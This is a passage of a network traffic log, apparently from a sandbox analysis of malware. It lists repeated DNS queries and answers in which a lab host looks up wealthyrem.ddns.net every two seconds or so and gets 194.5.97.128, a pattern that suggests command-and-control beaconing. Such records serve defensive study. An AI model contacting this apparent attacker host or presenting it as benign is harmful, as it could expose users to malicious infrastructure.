Aug 3, 2021 18:03:11.892159939 CEST	192.168.2.7	8.8.8.8	0x7d29	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:14.111555099 CEST	192.168.2.7	8.8.8.8	0x9932	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:16.298263073 CEST	192.168.2.7	8.8.8.8	0xde69	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:18.577682018 CEST	192.168.2.7	8.8.8.8	0x2e68	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:20.823909998 CEST	192.168.2.7	8.8.8.8	0x798b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:23.382271051 CEST	192.168.2.7	8.8.8.8	0x8e2f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:25.568608999 CEST	192.168.2.7	8.8.8.8	0x4611	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:27.786000013 CEST	192.168.2.7	8.8.8.8	0xa107	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:29.970823050 CEST	192.168.2.7	8.8.8.8	0xcfe7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:32.280169010 CEST	192.168.2.7	8.8.8.8	0x8b08	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:34.624697924 CEST	192.168.2.7	8.8.8.8	0x8116	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:36.843624115 CEST	192.168.2.7	8.8.8.8	0xd602	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:39.766789913 CEST	192.168.2.7	8.8.8.8	0x16a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:42.572490931 CEST	192.168.2.7	8.8.8.8	0x92f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:44.770999908 CEST	192.168.2.7	8.8.8.8	0x88a6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:46.998238087 CEST	192.168.2.7	8.8.8.8	0xa4e6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:49.284440041 CEST	192.168.2.7	8.8.8.8	0xdf82	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:51.488023996 CEST	192.168.2.7	8.8.8.8	0xff63	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:53.693032026 CEST	192.168.2.7	8.8.8.8	0xa21c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:55.907618999 CEST	192.168.2.7	8.8.8.8	0x8a7e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:58.144536972 CEST	192.168.2.7	8.8.8.8	0x5e20	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:00.352569103 CEST	192.168.2.7	8.8.8.8	0x4f3b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:02.567497015 CEST	192.168.2.7	8.8.8.8	0xa9e6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:04.826550007 CEST	192.168.2.7	8.8.8.8	0x8f00	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:07.021646976 CEST	192.168.2.7	8.8.8.8	0xf3e7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:09.210397959 CEST	192.168.2.7	8.8.8.8	0xb88c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:11.397119045 CEST	192.168.2.7	8.8.8.8	0xd8f3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:13.742794991 CEST	192.168.2.7	8.8.8.8	0x4252	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:16.432327032 CEST	192.168.2.7	8.8.8.8	0xc1ac	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:18.622884989 CEST	192.168.2.7	8.8.8.8	0x17fb	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:20.852276087 CEST	192.168.2.7	8.8.8.8	0x6718	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:23.043164968 CEST	192.168.2.7	8.8.8.8	0x9b99	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:25.248914957 CEST	192.168.2.7	8.8.8.8	0x1bb4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:27.449661016 CEST	192.168.2.7	8.8.8.8	0x108a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:29.668241978 CEST	192.168.2.7	8.8.8.8	0x8de1	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:31.869529963 CEST	192.168.2.7	8.8.8.8	0x13ad	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:34.244858027 CEST	192.168.2.7	8.8.8.8	0xd2b9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:36.483568907 CEST	192.168.2.7	8.8.8.8	0xcd9d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:38.694935083 CEST	192.168.2.7	8.8.8.8	0xa6cb	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:40.927027941 CEST	192.168.2.7	8.8.8.8	0xf65d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:43.148438931 CEST	192.168.2.7	8.8.8.8	0xcbd7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:45.355446100 CEST	192.168.2.7	8.8.8.8	0x19e1	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:47.541191101 CEST	192.168.2.7	8.8.8.8	0xbde2	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:49.799333096 CEST	192.168.2.7	8.8.8.8	0x8f91	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:53.196739912 CEST	192.168.2.7	8.8.8.8	0xa6f0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:55.389027119 CEST	192.168.2.7	8.8.8.8	0x2fd6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:57.591773987 CEST	192.168.2.7	8.8.8.8	0x813d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:59.795327902 CEST	192.168.2.7	8.8.8.8	0x903a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:01.986629009 CEST	192.168.2.7	8.8.8.8	0x264a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:04.179060936 CEST	192.168.2.7	8.8.8.8	0xefb3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:06.370069027 CEST	192.168.2.7	8.8.8.8	0x4fc4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:08.592544079 CEST	192.168.2.7	8.8.8.8	0xd1f4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:11.766412020 CEST	192.168.2.7	8.8.8.8	0x5a16	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:13.996082067 CEST	192.168.2.7	8.8.8.8	0x8e29	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:16.184967995 CEST	192.168.2.7	8.8.8.8	0x3c60	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:18.386063099 CEST	192.168.2.7	8.8.8.8	0xedbb	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:20.575215101 CEST	192.168.2.7	8.8.8.8	0x9e9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:22.764461040 CEST	192.168.2.7	8.8.8.8	0x378	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:25.003761053 CEST	192.168.2.7	8.8.8.8	0x87e4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:27.221846104 CEST	192.168.2.7	8.8.8.8	0xd4aa	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:30.703397036 CEST	192.168.2.7	8.8.8.8	0x1d87	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:33.031140089 CEST	192.168.2.7	8.8.8.8	0x4a12	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:35.231430054 CEST	192.168.2.7	8.8.8.8	0x7c58	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:37.450562000 CEST	192.168.2.7	8.8.8.8	0x9baa	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:39.653464079 CEST	192.168.2.7	8.8.8.8	0x643f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:41.900424957 CEST	192.168.2.7	8.8.8.8	0x582d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:44.099422932 CEST	192.168.2.7	8.8.8.8	0x835d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:46.318114996 CEST	192.168.2.7	8.8.8.8	0xb619	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:49.050117970 CEST	192.168.2.7	8.8.8.8	0xad66	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:51.279237032 CEST	192.168.2.7	8.8.8.8	0x2e1a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:53.496871948 CEST	192.168.2.7	8.8.8.8	0x421b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:55.702008009 CEST	192.168.2.7	8.8.8.8	0xc87	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:57.925591946 CEST	192.168.2.7	8.8.8.8	0xee3f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:00.129034042 CEST	192.168.2.7	8.8.8.8	0xe089	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:02.342406988 CEST	192.168.2.7	8.8.8.8	0xc548	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:04.561638117 CEST	192.168.2.7	8.8.8.8	0x86c3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:06.782063007 CEST	192.168.2.7	8.8.8.8	0x4a5c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:08.985441923 CEST	192.168.2.7	8.8.8.8	0x9c4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:11.207012892 CEST	192.168.2.7	8.8.8.8	0x33ba	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:13.475601912 CEST	192.168.2.7	8.8.8.8	0x571e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:15.661334038 CEST	192.168.2.7	8.8.8.8	0x6b30	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:17.860109091 CEST	192.168.2.7	8.8.8.8	0x4ea5	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:20.232481003 CEST	192.168.2.7	8.8.8.8	0x1cc7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:22.489272118 CEST	192.168.2.7	8.8.8.8	0xb059	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:24.708709002 CEST	192.168.2.7	8.8.8.8	0x437f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:26.908519983 CEST	192.168.2.7	8.8.8.8	0x4247	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:29.123908043 CEST	192.168.2.7	8.8.8.8	0x5512	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:31.318967104 CEST	192.168.2.7	8.8.8.8	0xd5e3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:33.526235104 CEST	192.168.2.7	8.8.8.8	0xf54d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:35.725197077 CEST	192.168.2.7	8.8.8.8	0x75c3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:37.910315990 CEST	192.168.2.7	8.8.8.8	0xc0a5	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:41.046650887 CEST	192.168.2.7	8.8.8.8	0x7b64	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:43.236715078 CEST	192.168.2.7	8.8.8.8	0x1d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:45.437988043 CEST	192.168.2.7	8.8.8.8	0xfd8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:47.642828941 CEST	192.168.2.7	8.8.8.8	0xb137	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:49.829391956 CEST	192.168.2.7	8.8.8.8	0x7a24	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 17:58:16.621526003 CEST	8.8.8.8	192.168.2.7	0x6f82	No error (0)	clientconfig.passport.net	authgfx.msa.akadns6.net		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:00:40.761003017 CEST	8.8.8.8	192.168.2.7	0x738d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:42.986603022 CEST	8.8.8.8	192.168.2.7	0x90c7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:45.200649023 CEST	8.8.8.8	192.168.2.7	0x56c0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:47.415944099 CEST	8.8.8.8	192.168.2.7	0x99ee	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:49.603174925 CEST	8.8.8.8	192.168.2.7	0x7ab2	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:51.812900066 CEST	8.8.8.8	192.168.2.7	0x31cd	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:54.018591881 CEST	8.8.8.8	192.168.2.7	0xdaf9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:56.278626919 CEST	8.8.8.8	192.168.2.7	0x350	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:00:58.484508038 CEST	8.8.8.8	192.168.2.7	0xcfca	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:00.686336040 CEST	8.8.8.8	192.168.2.7	0xae34	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:02.893786907 CEST	8.8.8.8	192.168.2.7	0xf50e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:05.097134113 CEST	8.8.8.8	192.168.2.7	0x8ff2	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:07.305535078 CEST	8.8.8.8	192.168.2.7	0xe6a3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:09.539190054 CEST	8.8.8.8	192.168.2.7	0x2701	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:11.859661102 CEST	8.8.8.8	192.168.2.7	0xf0b5	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:15.058917046 CEST	8.8.8.8	192.168.2.7	0x3e9e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:17.270273924 CEST	8.8.8.8	192.168.2.7	0x3d9e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:19.490765095 CEST	8.8.8.8	192.168.2.7	0x3138	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:21.704298019 CEST	8.8.8.8	192.168.2.7	0xc0be	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:23.886974096 CEST	8.8.8.8	192.168.2.7	0xed2c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:26.071243048 CEST	8.8.8.8	192.168.2.7	0xa6ab	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:28.346940041 CEST	8.8.8.8	192.168.2.7	0xe72	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:30.546425104 CEST	8.8.8.8	192.168.2.7	0x73	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:32.729451895 CEST	8.8.8.8	192.168.2.7	0x4dee	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:34.942574024 CEST	8.8.8.8	192.168.2.7	0x125	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:37.136523008 CEST	8.8.8.8	192.168.2.7	0x3b76	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:39.335952044 CEST	8.8.8.8	192.168.2.7	0xe6e0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:41.540939093 CEST	8.8.8.8	192.168.2.7	0x14ed	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:43.783260107 CEST	8.8.8.8	192.168.2.7	0x53a1	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:45.997164011 CEST	8.8.8.8	192.168.2.7	0xd0b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:48.197298050 CEST	8.8.8.8	192.168.2.7	0xd981	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:50.403202057 CEST	8.8.8.8	192.168.2.7	0xe3ac	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:52.601558924 CEST	8.8.8.8	192.168.2.7	0x8a7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:54.808830976 CEST	8.8.8.8	192.168.2.7	0x2605	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:56.996222019 CEST	8.8.8.8	192.168.2.7	0x87f4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:01:59.268136978 CEST	8.8.8.8	192.168.2.7	0xb27a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:01.475634098 CEST	8.8.8.8	192.168.2.7	0x5296	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:03.671786070 CEST	8.8.8.8	192.168.2.7	0xac70	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:07.007635117 CEST	8.8.8.8	192.168.2.7	0xb39f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:09.203102112 CEST	8.8.8.8	192.168.2.7	0x6b0f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:11.403228998 CEST	8.8.8.8	192.168.2.7	0x1c7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:13.610809088 CEST	8.8.8.8	192.168.2.7	0xc54b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:15.977773905 CEST	8.8.8.8	192.168.2.7	0xcd0b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:18.978045940 CEST	8.8.8.8	192.168.2.7	0xf049	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:21.190454006 CEST	8.8.8.8	192.168.2.7	0x3892	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:23.369951963 CEST	8.8.8.8	192.168.2.7	0x991	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:25.565526962 CEST	8.8.8.8	192.168.2.7	0x25ef	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:27.766803026 CEST	8.8.8.8	192.168.2.7	0xdaab	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:29.953804970 CEST	8.8.8.8	192.168.2.7	0x9f46	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:32.196198940 CEST	8.8.8.8	192.168.2.7	0x5b39	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:34.395683050 CEST	8.8.8.8	192.168.2.7	0x3531	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:36.598649979 CEST	8.8.8.8	192.168.2.7	0xb7a6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:38.814450979 CEST	8.8.8.8	192.168.2.7	0x42e2	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:41.020540953 CEST	8.8.8.8	192.168.2.7	0x20bf	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:43.230957031 CEST	8.8.8.8	192.168.2.7	0x27d7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:45.415544033 CEST	8.8.8.8	192.168.2.7	0x58b6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:47.665286064 CEST	8.8.8.8	192.168.2.7	0x5cc6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:49.849251986 CEST	8.8.8.8	192.168.2.7	0xe02b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:52.054344893 CEST	8.8.8.8	192.168.2.7	0x186d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:54.227219105 CEST	8.8.8.8	192.168.2.7	0x2186	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:56.434458971 CEST	8.8.8.8	192.168.2.7	0x2323	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:02:58.624461889 CEST	8.8.8.8	192.168.2.7	0xd3f6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:00.814369917 CEST	8.8.8.8	192.168.2.7	0x4b6d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:03.089088917 CEST	8.8.8.8	192.168.2.7	0x4c22	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:04.696907997 CEST	8.8.8.8	192.168.2.7	0x75c7	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:03:05.286665916 CEST	8.8.8.8	192.168.2.7	0xd143	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:07.507150888 CEST	8.8.8.8	192.168.2.7	0x9af0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:09.706294060 CEST	8.8.8.8	192.168.2.7	0xaf82	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:11.925440073 CEST	8.8.8.8	192.168.2.7	0x7d29	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:14.144275904 CEST	8.8.8.8	192.168.2.7	0x9932	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:16.334412098 CEST	8.8.8.8	192.168.2.7	0xde69	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:18.609951973 CEST	8.8.8.8	192.168.2.7	0x2e68	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:20.857263088 CEST	8.8.8.8	192.168.2.7	0x798b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:23.414494038 CEST	8.8.8.8	192.168.2.7	0x8e2f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:25.596151114 CEST	8.8.8.8	192.168.2.7	0x4611	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:27.820512056 CEST	8.8.8.8	192.168.2.7	0xa107	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:30.006797075 CEST	8.8.8.8	192.168.2.7	0xcfe7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
